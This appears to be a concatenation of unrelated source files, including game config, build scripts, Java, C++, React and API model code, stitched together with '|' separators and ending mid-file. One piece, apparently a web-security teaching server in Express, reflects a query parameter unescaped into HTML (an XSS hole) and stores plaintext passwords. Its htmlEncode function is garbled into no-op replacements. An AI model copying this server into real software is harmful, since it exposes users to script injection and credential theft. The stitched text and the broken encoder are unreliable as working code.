const terminalConfiguration = {
terminalCheckInterval:100,
terminalSendInterval:200,
baseReservedEnergy:30000,
baseReservedMineral:10000,
mineralDistributeMinAmount:2500,
sellingEnergy:{
"W22N25":0,
"W23N25":0,
"W21N24":0,
"W19N22":0,
"W18N22":0
},
sellingMineral:{
"W22N25":0,
"W23N25":0,
"W21N24":0,
"W19N22":10000,
"W18N22":0
},
sellingGoods:{
//[(resourceType),(reservedAmount),(minSellAmount)]
"W22N25":[[RESOURCE_SWITCH,0,25]],
"W23N25":[],
"W21N24":[[RESOURCE_BATTERY,1000,1000]],
"W19N22":[],
"W18N22":[]
},
buyingGoods:{
//[(resourceType),(beginBuyingAmount),(endBuyingAmount)]
"W22N25":[[RESOURCE_OXYGEN,2500,5000],[RESOURCE_LEMERGIUM,2500,5000],[RESOURCE_UTRIUM,2500,5000],[RESOURCE_ZYNTHIUM,2500,5000],[RESOURCE_ENERGY,100000,150000]],
"W23N25":[[RESOURCE_OXYGEN,2500,5000]],
"W21N24":[[RESOURCE_OXYGEN,2500,5000]],
"W19N22":[],
"W18N22":[]
},
mostDesiredGoods:{ // Buy as much as it can
interval:10,
[RESOURCE_POWER]:{
maxPrice:4.5, // Will buy these goods under this line
minCredits:10000,
}
},
}
module.exports = terminalConfiguration |
#!/usr/bin/env bash
set -euo pipefail
IFS=$'\n\t'
./configure \
"--prefix=${PREFIX}" \
"--with-systemdsystemunitdir=${PREFIX}/lib/systemd/system" \
--disable-python \
--disable-perl \
--disable-ruby \
--disable-lua \
--disable-tcl \
--disable-docs
make "-j${CPU_COUNT}"
XFAIL_TESTS=""
if [[ "$(uname)" == "Darwin" && "${PKG_VERSION}" == "1.7.2" ]]; then
# Known failure, should be fixed in the next version
# https://github.com/oetiker/rrdtool-1.x/issues/1012
XFAIL_TESTS="${XFAIL_TESTS} rpn2"
fi
make check XFAIL_TESTS="${XFAIL_TESTS}" || (cat tests/test-suite.log && exit 1)
make install
|
from LightPipes import *
wavelength = 500*nm
size = 25*mm
N = 500
F = Begin(size, wavelength, N)
F = CircAperture(F, 2*mm, x_shift = 5*mm, y_shift = 3*mm)
F = Fresnel(F, 10*m)
Xc,Yc, NXc, NYc = Centroid(F)
print("Xc = {:4.2f} mm, Yc = {:4.2f} mm".format(Xc/mm, Yc/mm))
|
<reponame>sillyhong/whongjiagou-learn<filename>50.safe/src/server.js
const express = require('express');
const path = require('path');
const bodyParser = require('body-parser');
const cookieParser = require('cookie-parser');
var svgCaptcha = require('svg-captcha');
const app = express();
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));
app.use(cookieParser());
app.use(express.static(path.resolve(__dirname, 'public')));
const goods = {
'book': [{ name: '变形计' }, { name: '双城记' }],
'electronic': [{ name: 'ipad' }, { name: 'iphone' }]
}
app.get('/goods', function (req, res) {
let { category } = req.query;
res.setHeader('Content-Type', 'text/html;charset=utf8');
let currentGoods = goods[category];
let detail = '';
if (currentGoods) {
detail = currentGoods.map(item => `<li>${item.name}</li>`).join('')
} else {
detail = '此分类下面没有商品';
}
res.send(`
<h1>你选择的商品分类是: ${category}</h1>
<ul>${detail}</ul>
`);
});
//此路由用来获取所有的评论
let defaultComment = { time: new Date().toLocaleString(), avatar: 'http://www.gravatar.com/avatar/836875012qq.com.png' };
let comments = [
{ username: '张三', content: '今天下雨了', ...defaultComment },
{ username: '李四', content: '今天没带伞', ...defaultComment }
];
app.get('/api/comments', function (req, res) {
res.json({ code: 0, comments });
});
function htmlEncode(str) {
return String(str)
.replace(/&/g, '&')
.replace(/"/g, '"')
.replace(/'/g, ''')
.replace(/</g, '<')
.replace(/>/g, '>');
}
app.post('/api/comments', function (req, res) {
//req.cookies.sessionId=session-1528513256445657.3938924080318
let session = sessions[req.cookies.sessionId];
if (session && session.user) {
let comment = req.body;// username content
comments.push({
...defaultComment,
username: session.user.username,
content: comment.content
});
res.json({ code: 0 });
} else {
res.json({ code: 1, error: '此用户未登录,不能发表评论 ' });
}
});
let users = [
{ username: 'a', password: 'a', balance: 1000 },
{ username: 'b', password: 'b', balance: 1000 }
];
function getAdmin(user) {
for (let i = 0; i < users.length; i++) {
if (users[i].username == user.username && users[i].password == <PASSWORD>) {
return users[i];
}
}
}
//会话对象
let sessions = {};
app.post('/api/login', function (req, res) {
let body = req.body;// username password
let user = getAdmin(body);
if (user) {//如果登录成功 设置cookie和session会话
let sessionId = 'session-' + Date.now() + Math.random() * 1000;
//把sessionId这个值发送给了客户端
res.cookie('sessionId', sessionId, { httpOnly: true });
res.cookie('token', 'token_' + sessionId);
//在服务器端记录此会话ID对应的数据
sessions[sessionId] = { user };
res.json({ code: 0, user });
} else {
res.json({ code: 1, error: '用户名密码错误' });
}
});
app.get('/userInfo', function (req, res) {
let session = sessions[req.cookies.sessionId];
if (session && session.user) {
res.json({ code: 0, user: session.user });
} else {
res.json({ code: 1, error: '用户未登录' });
}
});
app.post('/api/transfer', function (req, res) {
let referer = req.headers['referer'];//http://localhost:3000
if (/^https?:\/\/localhost:3000/.test(referer)) {
let session = sessions[req.cookies.sessionId];
if (session && session.user) {
let { target, amount, captcha, clientToken } = req.body;// target amount
if (clientToken == 'token_' + req.cookies.sessionId) {
if (captcha == session.captcha) {
amount = isNaN(amount) ? 0 : Number(amount);
for (let i = 0; i < users.length; i++) {
if (users[i].username == session.user.username) {
users[i].balance -= amount;
} else if (users[i].username == target) {
users[i].balance += amount;
}
}
res.json({ code: 0 });
} else {
res.json({ code: 1, error: '验证码不正确' });
}
} else {
res.json({ code: 1, error: 'token验证失败' });
}
} else {
res.json({ code: 1, error: '用户未登录' });
}
} else {
res.json({ code: 1, error: 'refer错误 ' });
}
});
app.get('/api/captcha', function (req, res) {
let session = sessions[req.cookies.sessionId];
if (session) {
var captcha = svgCaptcha.create();//生成验证码
session.captcha = captcha.text;//把验证码的文件保存在session里
res.json({ code: 0, data: captcha.data });//data是真正的验证码的SVG数据图
} else {
res.json({ code: 1, error: '用户未登录' });
}
});
app.listen(3000); |
# To allow update OS version
kubectl drain <Node name>
# To allow non-scheduling
kubectl cordon <Node name>
# To allow uncordon
kubectl uncordon <Node name>
Version 1.10 1.11 1.12
=> api-server: 1.11
=> scheduler + controler: 1.10 1.11
=> kube proxy + kubelet: 1.10 1.11
=> kubectl: 1.11 1.12 |
/*
* Copyright (C) 2012-2014 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package info.archinnov.achilles.internal.persistence.operations;
import static com.google.common.collect.FluentIterable.from;
import static info.archinnov.achilles.internal.proxy.dirtycheck.DirtyChecker.COLLECTION_AND_MAP_FIELD;
import static info.archinnov.achilles.internal.proxy.dirtycheck.DirtyChecker.EXTRACT_META;
import static info.archinnov.achilles.internal.proxy.dirtycheck.DirtyChecker.SIMPLE_FIELD;
import java.lang.reflect.Method;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Comparator;
import java.util.List;
import java.util.Map;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import info.archinnov.achilles.internal.context.facade.EntityOperations;
import info.archinnov.achilles.internal.metadata.holder.EntityMeta;
import info.archinnov.achilles.internal.metadata.holder.PropertyMeta;
import info.archinnov.achilles.internal.proxy.ProxyInterceptor;
import info.archinnov.achilles.internal.proxy.dirtycheck.DirtyCheckChangeSet;
import info.archinnov.achilles.internal.proxy.dirtycheck.DirtyChecker;
import info.archinnov.achilles.internal.validation.Validator;
public class EntityUpdater {
private static final Logger log = LoggerFactory.getLogger(EntityUpdater.class);
private PropertyMetaComparator comparator = new PropertyMetaComparator();
private CounterPersister counterPersister = CounterPersister.Singleton.INSTANCE.get();
private EntityProxifier proxifier = EntityProxifier.Singleton.INSTANCE.get();
public void update(EntityOperations context, Object entity) {
log.debug("Merging entity of class {} with primary key {}", context.getEntityClass().getCanonicalName(),
context.getPrimaryKey());
EntityMeta entityMeta = context.getEntityMeta();
Validator.validateNotNull(entity, "Proxy object should not be null for update");
Validator.validateNotNull(entityMeta, "entityMeta should not be null for update");
log.debug("Checking for dirty fields before merging");
Object realObject = proxifier.getRealObject(entity);
context.setEntity(realObject);
ProxyInterceptor<Object> interceptor = proxifier.getInterceptor(entity);
Map<Method, DirtyChecker> dirtyMap = interceptor.getDirtyMap();
List<DirtyChecker> dirtyCheckers = new ArrayList<>(dirtyMap.values());
if (dirtyCheckers.size() > 0) {
pushDirtySimpleFields(context, dirtyCheckers);
pushCollectionAndMapUpdates(context, dirtyCheckers);
dirtyMap.clear();
}
if (context.isClusteredCounter()) {
counterPersister.persistClusteredCounters(context);
} else {
counterPersister.persistCounters(context, entityMeta.getAllCounterMetas());
}
interceptor.setEntityOperations(context);
interceptor.setTarget(realObject);
}
private void pushCollectionAndMapUpdates(EntityOperations context, List<DirtyChecker> dirtyCheckers) {
final List<DirtyChecker> collectionsAndMaps = from(dirtyCheckers)
.filter(COLLECTION_AND_MAP_FIELD)
.toList();
for (DirtyChecker dirtyChecker : collectionsAndMaps) {
for (DirtyCheckChangeSet changeSet : dirtyChecker.getChangeSets()) {
context.pushCollectionAndMapUpdateStatements(changeSet);
}
}
}
private void pushDirtySimpleFields(EntityOperations context, List<DirtyChecker> dirtyCheckers) {
final List<PropertyMeta> sortedSimpleMetas = new ArrayList<>(from(dirtyCheckers)
.filter(SIMPLE_FIELD)
.transform(EXTRACT_META)
.toList());
if (sortedSimpleMetas.size() > 0) {
Collections.sort(sortedSimpleMetas, comparator);
context.pushUpdateStatement(sortedSimpleMetas);
}
}
public static class PropertyMetaComparator implements Comparator<PropertyMeta> {
@Override
public int compare(PropertyMeta arg0, PropertyMeta arg1) {
return arg0.getCQL3ColumnName().compareTo(arg1.getCQL3ColumnName());
}
}
public static enum Singleton {
INSTANCE;
private final EntityUpdater instance = new EntityUpdater();
public EntityUpdater get() {
return instance;
}
}
}
|
TERMUX_PKG_HOMEPAGE=https://github.com/jtyr/gbt
TERMUX_PKG_DESCRIPTION="Highly configurable prompt builder for Bash and ZSH written in Go"
TERMUX_PKG_LICENSE="MIT"
TERMUX_PKG_MAINTAINER="@termux"
TERMUX_PKG_VERSION=2.0.0
TERMUX_PKG_REVISION=2
TERMUX_PKG_SRCURL=https://github.com/jtyr/gbt/archive/v${TERMUX_PKG_VERSION}.tar.gz
TERMUX_PKG_SHA256=b324695dc432e8e22bc257f7a6ec576f482ec418fb9c9a8301f47bfdf7766998
_COMMIT=29dc3dac6c06518073a8e879d2b6ec65291ddab2
termux_step_make_install() {
cd $TERMUX_PKG_SRCDIR
termux_setup_golang
export GOPATH=$HOME/go
mkdir -p $GOPATH/{bin,pkg,src/github.com/jtyr}
ln -fs $TERMUX_PKG_SRCDIR $GOPATH/src/github.com/jtyr/gbt
go build -ldflags="-s -w -X main.version=$TERMUX_PKG_VERSION -X main.build=${_COMMIT::6}" -o $TERMUX_PREFIX/bin/gbt github.com/jtyr/gbt/cmd/gbt
mkdir -p $TERMUX_PREFIX/{doc/gbt,share/gbt}
cp -r $TERMUX_PKG_SRCDIR/{sources,themes} $TERMUX_PREFIX/share/gbt/
cp -r $TERMUX_PKG_SRCDIR/{LICENSE,README.md} $TERMUX_PREFIX/doc/gbt/
}
|
<reponame>fr1t2/docusign-node-client
/**
* DocuSign REST API
* The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign.
*
* OpenAPI spec version: v2.1
* Contact: <EMAIL>
*
* NOTE: This class is auto generated. Do not edit the class manually and submit a new issue instead.
*
*/
(function(root, factory) {
if (typeof define === 'function' && define.amd) {
// AMD. Register as an anonymous module.
define(['ApiClient', 'model/AddressInformation', 'model/ConnectUserObject', 'model/ErrorDetails', 'model/ForgottenPasswordInformation', 'model/Group', 'model/NameValue', 'model/UserSettingsInformation'], factory);
} else if (typeof module === 'object' && module.exports) {
// CommonJS-like environments that support module.exports, like Node.
module.exports = factory(require('../ApiClient'), require('./AddressInformation'), require('./ConnectUserObject'), require('./ErrorDetails'), require('./ForgottenPasswordInformation'), require('./Group'), require('./NameValue'), require('./UserSettingsInformation'));
} else {
// Browser globals (root is window)
if (!root.Docusign) {
root.Docusign = {};
}
root.Docusign.UserInformation = factory(root.Docusign.ApiClient, root.Docusign.AddressInformation, root.Docusign.ConnectUserObject, root.Docusign.ErrorDetails, root.Docusign.ForgottenPasswordInformation, root.Docusign.Group, root.Docusign.NameValue, root.Docusign.UserSettingsInformation);
}
}(this, function(ApiClient, AddressInformation, ConnectUserObject, ErrorDetails, ForgottenPasswordInformation, Group, NameValue, UserSettingsInformation) {
'use strict';
/**
* The UserInformation model module.
* @module model/UserInformation
* @version 3.0.0
*/
/**
* Constructs a new <code>UserInformation</code>.
* @alias module:model/UserInformation
* @class
*/
var exports = function() {
var _this = this;
};
/**
* Constructs a <code>UserInformation</code> from a plain JavaScript object, optionally creating a new instance.
* Copies all relevant properties from <code>data</code> to <code>obj</code> if supplied or a new instance if not.
* @param {Object} data The plain JavaScript object bearing properties of interest.
* @param {module:model/UserInformation} obj Optional instance to populate.
* @return {module:model/UserInformation} The populated <code>UserInformation</code> instance.
*/
exports.constructFromObject = function(data, obj) {
if (data) {
obj = obj || new exports();
if (data.hasOwnProperty('activationAccessCode')) {
obj['activationAccessCode'] = ApiClient.convertToType(data['activationAccessCode'], 'String');
}
if (data.hasOwnProperty('company')) {
obj['company'] = ApiClient.convertToType(data['company'], 'String');
}
if (data.hasOwnProperty('connectConfigurations')) {
obj['connectConfigurations'] = ApiClient.convertToType(data['connectConfigurations'], [ConnectUserObject]);
}
if (data.hasOwnProperty('countryCode')) {
obj['countryCode'] = ApiClient.convertToType(data['countryCode'], 'String');
}
if (data.hasOwnProperty('createdDateTime')) {
obj['createdDateTime'] = ApiClient.convertToType(data['createdDateTime'], 'String');
}
if (data.hasOwnProperty('customSettings')) {
obj['customSettings'] = ApiClient.convertToType(data['customSettings'], [NameValue]);
}
if (data.hasOwnProperty('defaultAccountId')) {
obj['defaultAccountId'] = ApiClient.convertToType(data['defaultAccountId'], 'String');
}
if (data.hasOwnProperty('email')) {
obj['email'] = ApiClient.convertToType(data['email'], 'String');
}
if (data.hasOwnProperty('enableConnectForUser')) {
obj['enableConnectForUser'] = ApiClient.convertToType(data['enableConnectForUser'], 'String');
}
if (data.hasOwnProperty('errorDetails')) {
obj['errorDetails'] = ErrorDetails.constructFromObject(data['errorDetails']);
}
if (data.hasOwnProperty('firstName')) {
obj['firstName'] = ApiClient.convertToType(data['firstName'], 'String');
}
if (data.hasOwnProperty('forgottenPasswordInfo')) {
obj['forgottenPasswordInfo'] = ForgottenPasswordInformation.constructFromObject(data['forgottenPasswordInfo']);
}
if (data.hasOwnProperty('groupList')) {
obj['groupList'] = ApiClient.convertToType(data['groupList'], [Group]);
}
if (data.hasOwnProperty('homeAddress')) {
obj['homeAddress'] = AddressInformation.constructFromObject(data['homeAddress']);
}
if (data.hasOwnProperty('initialsImageUri')) {
obj['initialsImageUri'] = ApiClient.convertToType(data['initialsImageUri'], 'String');
}
if (data.hasOwnProperty('isAdmin')) {
obj['isAdmin'] = ApiClient.convertToType(data['isAdmin'], 'String');
}
if (data.hasOwnProperty('isNAREnabled')) {
obj['isNAREnabled'] = ApiClient.convertToType(data['isNAREnabled'], 'String');
}
if (data.hasOwnProperty('jobTitle')) {
obj['jobTitle'] = ApiClient.convertToType(data['jobTitle'], 'String');
}
if (data.hasOwnProperty('lastLogin')) {
obj['lastLogin'] = ApiClient.convertToType(data['lastLogin'], 'String');
}
if (data.hasOwnProperty('lastName')) {
obj['lastName'] = ApiClient.convertToType(data['lastName'], 'String');
}
if (data.hasOwnProperty('loginStatus')) {
obj['loginStatus'] = ApiClient.convertToType(data['loginStatus'], 'String');
}
if (data.hasOwnProperty('middleName')) {
obj['middleName'] = ApiClient.convertToType(data['middleName'], 'String');
}
if (data.hasOwnProperty('password')) {
obj['password'] = ApiClient.convertToType(data['password'], 'String');
}
if (data.hasOwnProperty('passwordExpiration')) {
obj['passwordExpiration'] = ApiClient.convertToType(data['passwordExpiration'], 'String');
}
if (data.hasOwnProperty('permissionProfileId')) {
obj['permissionProfileId'] = ApiClient.convertToType(data['permissionProfileId'], 'String');
}
if (data.hasOwnProperty('permissionProfileName')) {
obj['permissionProfileName'] = ApiClient.convertToType(data['permissionProfileName'], 'String');
}
if (data.hasOwnProperty('profileImageUri')) {
obj['profileImageUri'] = ApiClient.convertToType(data['profileImageUri'], 'String');
}
if (data.hasOwnProperty('sendActivationEmail')) {
obj['sendActivationEmail'] = ApiClient.convertToType(data['sendActivationEmail'], 'String');
}
if (data.hasOwnProperty('sendActivationOnInvalidLogin')) {
obj['sendActivationOnInvalidLogin'] = ApiClient.convertToType(data['sendActivationOnInvalidLogin'], 'String');
}
if (data.hasOwnProperty('signatureImageUri')) {
obj['signatureImageUri'] = ApiClient.convertToType(data['signatureImageUri'], 'String');
}
if (data.hasOwnProperty('subscribe')) {
obj['subscribe'] = ApiClient.convertToType(data['subscribe'], 'String');
}
if (data.hasOwnProperty('suffixName')) {
obj['suffixName'] = ApiClient.convertToType(data['suffixName'], 'String');
}
if (data.hasOwnProperty('title')) {
obj['title'] = ApiClient.convertToType(data['title'], 'String');
}
if (data.hasOwnProperty('uri')) {
obj['uri'] = ApiClient.convertToType(data['uri'], 'String');
}
if (data.hasOwnProperty('userAddedToAccountDateTime')) {
obj['userAddedToAccountDateTime'] = ApiClient.convertToType(data['userAddedToAccountDateTime'], 'String');
}
if (data.hasOwnProperty('userId')) {
obj['userId'] = ApiClient.convertToType(data['userId'], 'String');
}
if (data.hasOwnProperty('userName')) {
obj['userName'] = ApiClient.convertToType(data['userName'], 'String');
}
if (data.hasOwnProperty('userProfileLastModifiedDate')) {
obj['userProfileLastModifiedDate'] = ApiClient.convertToType(data['userProfileLastModifiedDate'], 'String');
}
if (data.hasOwnProperty('userSettings')) {
obj['userSettings'] = UserSettingsInformation.constructFromObject(data['userSettings']);
}
if (data.hasOwnProperty('userStatus')) {
obj['userStatus'] = ApiClient.convertToType(data['userStatus'], 'String');
}
if (data.hasOwnProperty('userType')) {
obj['userType'] = ApiClient.convertToType(data['userType'], 'String');
}
if (data.hasOwnProperty('workAddress')) {
obj['workAddress'] = AddressInformation.constructFromObject(data['workAddress']);
}
}
return obj;
}
/**
* The activation code the new user must enter when activating their account.
* @member {String} activationAccessCode
*/
exports.prototype['activationAccessCode'] = undefined;
/**
*
* @member {String} company
*/
exports.prototype['company'] = undefined;
/**
*
* @member {Array.<module:model/ConnectUserObject>} connectConfigurations
*/
exports.prototype['connectConfigurations'] = undefined;
/**
*
* @member {String} countryCode
*/
exports.prototype['countryCode'] = undefined;
/**
* Indicates the date and time the item was created.
* @member {String} createdDateTime
*/
exports.prototype['createdDateTime'] = undefined;
/**
* The name/value pair information for the user custom setting.
* @member {Array.<module:model/NameValue>} customSettings
*/
exports.prototype['customSettings'] = undefined;
/**
*
* @member {String} defaultAccountId
*/
exports.prototype['defaultAccountId'] = undefined;
/**
*
* @member {String} email
*/
exports.prototype['email'] = undefined;
/**
* Specifies whether the user is enabled for updates from DocuSign Connect. Valid values: true or false.
* @member {String} enableConnectForUser
*/
exports.prototype['enableConnectForUser'] = undefined;
/**
* @member {module:model/ErrorDetails} errorDetails
*/
exports.prototype['errorDetails'] = undefined;
/**
* The user's first name. Maximum Length: 50 characters.
* @member {String} firstName
*/
exports.prototype['firstName'] = undefined;
/**
* @member {module:model/ForgottenPasswordInformation} forgottenPasswordInfo
*/
exports.prototype['forgottenPasswordInfo'] = undefined;
/**
* A list of the group information for groups to add the user to. Group information can be found by calling [ML:GET group information]. The only required parameter is groupId. The parameters are: * groupId - The DocuSign group ID for the group. * groupName - The name of the group * permissionProfileId - The ID of the permission profile associated with the group. * groupType - The group type.
* @member {Array.<module:model/Group>} groupList
*/
exports.prototype['groupList'] = undefined;
/**
* @member {module:model/AddressInformation} homeAddress
*/
exports.prototype['homeAddress'] = undefined;
/**
* Contains the URI for an endpoint that you can use to retrieve the initials image.
* @member {String} initialsImageUri
*/
exports.prototype['initialsImageUri'] = undefined;
/**
* Determines if the feature set is actively set as part of the plan.
* @member {String} isAdmin
*/
exports.prototype['isAdmin'] = undefined;
/**
*
* @member {String} isNAREnabled
*/
exports.prototype['isNAREnabled'] = undefined;
/**
*
* @member {String} jobTitle
*/
exports.prototype['jobTitle'] = undefined;
/**
* Shows the date-time when the user last logged on to the system.
* @member {String} lastLogin
*/
exports.prototype['lastLogin'] = undefined;
/**
* The user's last name. Maximum Length: 50 characters.
* @member {String} lastName
*/
exports.prototype['lastName'] = undefined;
/**
* Shows the current status of the user's password. Possible values are: * password_reset * password_active * password_expired * password_locked * password_reset_failed
* @member {String} loginStatus
*/
exports.prototype['loginStatus'] = undefined;
/**
* The user's middle name. Maximum Length: 50 characters.
* @member {String} middleName
*/
exports.prototype['middleName'] = undefined;
/**
*
* @member {String} password
*/
exports.prototype['password'] = undefined;
/**
*
* @member {String} passwordExpiration
*/
exports.prototype['passwordExpiration'] = undefined;
/**
*
* @member {String} permissionProfileId
*/
exports.prototype['permissionProfileId'] = undefined;
/**
*
* @member {String} permissionProfileName
*/
exports.prototype['permissionProfileName'] = undefined;
/**
*
* @member {String} profileImageUri
*/
exports.prototype['profileImageUri'] = undefined;
/**
*
* @member {String} sendActivationEmail
*/
exports.prototype['sendActivationEmail'] = undefined;
/**
* When set to **true**, specifies that an additional activation email is sent to the user if they fail a log on before activating their account.
* @member {String} sendActivationOnInvalidLogin
*/
exports.prototype['sendActivationOnInvalidLogin'] = undefined;
/**
* Contains the URI for an endpoint that you can use to retrieve the signature image.
* @member {String} signatureImageUri
*/
exports.prototype['signatureImageUri'] = undefined;
/**
*
* @member {String} subscribe
*/
exports.prototype['subscribe'] = undefined;
/**
* The suffix for the user's name. Maximum Length: 50 characters.
* @member {String} suffixName
*/
exports.prototype['suffixName'] = undefined;
/**
* The title of the user.
* @member {String} title
*/
exports.prototype['title'] = undefined;
/**
*
* @member {String} uri
*/
exports.prototype['uri'] = undefined;
/**
*
* @member {String} userAddedToAccountDateTime
*/
exports.prototype['userAddedToAccountDateTime'] = undefined;
/**
*
* @member {String} userId
*/
exports.prototype['userId'] = undefined;
/**
*
* @member {String} userName
*/
exports.prototype['userName'] = undefined;
/**
*
* @member {String} userProfileLastModifiedDate
*/
exports.prototype['userProfileLastModifiedDate'] = undefined;
/**
* @member {module:model/UserSettingsInformation} userSettings
*/
exports.prototype['userSettings'] = undefined;
/**
*
* @member {String} userStatus
*/
exports.prototype['userStatus'] = undefined;
/**
*
* @member {String} userType
*/
exports.prototype['userType'] = undefined;
/**
* @member {module:model/AddressInformation} workAddress
*/
exports.prototype['workAddress'] = undefined;
return exports;
}));
|
/*
* dbtype_PropertyDataSerializer.cpp
*/
#include "dbtypes/dbtype_PropertyDataSerializer.h"
namespace mutgos
{
namespace dbtype
{
// ----------------------------------------------------------------------
PropertyDataSerializer::PropertyDataSerializer()
{
}
// ----------------------------------------------------------------------
PropertyDataSerializer::~PropertyDataSerializer()
{
}
} /* namespace dbtype */
} /* namespace mutgos */
|
#!/bin/bash
# Use https://developers.google.com/closure/compiler/ to compile this code.
# Compiler should be available at ../../closure/compiler.jar relative to this build script.
rm -rf WMJS.min.js
java -jar ../../closure/compiler.jar --language_in=ECMASCRIPT6 --language_out ES5_STRICT --process_common_js_modules \
--module_resolution=NODE \
--js ../webmapjs_h/WMJSPolyfills.js \
--js ../webmapjs_h/WMJSProcessing.js \
--js ../webmapjs_h/WMJSTimeSelector.js \
--js ../webmapjs_h/WMJSTimeSlider.js \
--js ../webmapjs_h/WMJS_GFITimeElevation.js \
--js ../webmapjs_h/WMJSCoverage.js \
--js ../webmapjs/WMJSExternalDependencies.js \
--js ../webmapjs/WMJSConstants.js \
--js ../webmapjs/WMJSGlobals.js \
--js ../webmapjs/WMJSGetServiceFromStore.js \
--js ../webmapjs/I18n/lang.en.js \
--js ../webmapjs/WMJSTimer.js \
--js ../webmapjs/WMJSDebouncer.js \
--js ../webmapjs/WMJSAnimate.js \
--js ../webmapjs/WMJSTools.js \
--js ../webmapjs/WMJSLayer.js \
--js ../webmapjs/WMJSTime.js \
--js ../webmapjs/WMJSTileRenderer.js \
--js ../webmapjs/WMJSImageStore.js \
--js ../webmapjs/WMJSMap.js \
--js ../webmapjs/WMJSProjection.js \
--js ../webmapjs/WMJSBBOX.js \
--js ../webmapjs/WMJSDimension.js \
--js ../webmapjs/WMJSService.js \
--js ../webmapjs/WMJSListener.js \
--js ../webmapjs/WMJSImage.js \
--js ../webmapjs/WMJSXMLParser.js \
--js ../webmapjs/WMJSCanvasBuffer.js \
--js ../webmapjs/WMJSDialog.js \
--js ../webmapjs/WMJSDrawMarker.js \
--js ../webmapjs_h/WMJSDefineGlobals.js \
--js ../webmapjs_h/WMJSImportsToGlobal.js \
--create_source_map WMJS.min.js.map \
--js_output_file WMJS.min.js
echo "//# sourceMappingURL=WMJS.min.js.map" >> WMJS.min.js
#
# rm -rf jquery-addons.min.js
# java -jar ../../closure/compiler.jar --language_in=ECMASCRIPT6 --language_out ES5_STRICT \
# --js ../jquery/jquery.mousewheel.js \
# --js ../jquery/jquery-ui-timepicker-addon.js \
# --js ../jquery/globalize.js \
# --js_output_file jquery-addons.min.js
#
rm -rf adagucwebmapjs
mkdir adagucwebmapjs
echo "" > adagucwebmapjs/webmapjs.min.js
cat ../libs/d3/d3.v3.min.js >> adagucwebmapjs/webmapjs.min.js
cat ../libs/d3/c3.min.js >> adagucwebmapjs/webmapjs.min.js
cat ../libs/node_modules/moment/moment.js >> adagucwebmapjs/webmapjs.min.js
cat ../libs/node_modules/proj4/dist/proj4.js >> adagucwebmapjs/webmapjs.min.js
cat ../libs/node_modules/jquery/dist/jquery.min.js >> adagucwebmapjs/webmapjs.min.js
cat ../libs/node_modules/jquery-ui-dist/jquery-ui.min.js >> adagucwebmapjs/webmapjs.min.js
cat WMJS.min.js >> adagucwebmapjs/webmapjs.min.js
echo "" > adagucwebmapjs/webmapjs.min.css
cat ../webmapjs/WMJSStyles.css >> adagucwebmapjs/webmapjs.min.css
cat ../webmapjs_h/WMJS_GFITimeElevation.css >> adagucwebmapjs/webmapjs.min.css
cat ../webmapjs_h/WMJSTimeSelector.css >> adagucwebmapjs/webmapjs.min.css
rm -f WMJSExt.min.js
java -jar ../../closure/compiler.jar \
--create_source_map WMJSExt.min.js.map \
--js ../apps/appframework.js \
--js ../webmapjsext/WMJSExt/LayerPropertiesPanel.js \
--js ../webmapjsext/WMJSExt/StylePanel.js \
--js ../webmapjsext/WMJSExt/DimensionPanel.js \
--js ../webmapjsext/WMJSExt/MapPanel.js \
--js ../webmapjsext/WMJSExt/ServicePanel.js \
--js ../webmapjsext/WMJSExt/ServicePanelManager.js \
--js ../webmapjsext/WMJSExt/LayerPanel.js \
--js ../webmapjsext/WMJSExt/DataPanel.js \
--js ../webmapjsext/WMJSExt/BaseMapSelector.js \
--js ../webmapjsext/WMJSExt/MapTypeSelector.js \
--js ../webmapjsext/WMJSExt/AnimationPanel.js \
--js ../webmapjsext/WMJSExt/PermaLinkPanel.js \
--js ../webmapjsext/WMJSExt/UxDateTimeForm.js \
--js ../webmapjsext/WMJSExt/CheckColumn.js \
--js ../webmapjsext/WMJSExt/IFramePanel.js \
--js ../webmapjsext/WMJSExt/WCSPanel.js \
--js ../webmapjsext/WMJSExt/WindowFader.js \
--js ../webmapjsext/WMJSExtMain.js \
--js ../apps/gfiapp_d3c3.js \
--js ../apps/gfiapp_point_interest.js \
--js ../apps/gfiapp_eprofile.js \
--js ../apps/autowms_app.js \
--js ../apps/tddjs.js \
--js_output_file WMJSExt.min.js
echo "//# sourceMappingURL=WMJSExt.min.js.map" >> WMJSExt.min.js
# echo "" > adagucviewer.min.js
# cat ../jquery/hammer.min.js >> adagucviewer.min.js
# cat ../jquery/jquery-1.12.4.min.js >> adagucviewer.min.js
# cat ../jquery/jquery-ui.min.js >> adagucviewer.min.js
# cat jquery-addons.min.js >> adagucviewer.min.js
# cat ../d3/d3.v3.min.js >> adagucviewer.min.js
# cat ../d3/c3.min.js >> adagucviewer.min.js
# cat ../extjs-4.2.1/ext-all.js >> adagucviewer.min.js
# rm WMJS.min.js
# rm WMJSExt.min.js
# rm jquery-addons.min.js
|
import Typography from "@mui/material/Typography";
import Link from "@mui/material/Link";
import * as React from "react";
export default function Copyright(props) {
return (
<Typography variant="body2" color="text.secondary" align="center" {...props}>
{'Copyright © '}
<Link color="inherit" href="https://github.com/pajelonek/">
Clip Watcher
</Link>{' '}
{new Date().getFullYear()}
{'.'}
</Typography>
);
}
|
/*
* %CopyrightBegin%
*
* Copyright Ericsson AB 1999-2009. All Rights Reserved.
*
* The contents of this file are subject to the Erlang Public License,
* Version 1.1, (the "License"); you may not use this file except in
* compliance with the License. You should have received a copy of the
* Erlang Public License along with this software. If not, it can be
* retrieved online at http://www.erlang.org/.
*
* Software distributed under the License is distributed on an "AS IS"
* basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See
* the License for the specific language governing rights and limitations
* under the License.
*
* %CopyrightEnd%
*
*/
public class client {
private static java.lang.String SNode = "client";
private static java.lang.String PNode = "babbis";
private static java.lang.String Cookie = "flash";
private static java.lang.String Server = "rmod_random_impl";
private static rmod._randomStub stub;
public static void main(String[] args) {
try {
stub = new rmod._randomStub(SNode,PNode,Cookie,Server);
int seed1 = 1;
int seed2 = 2;
int seed3 = 3;
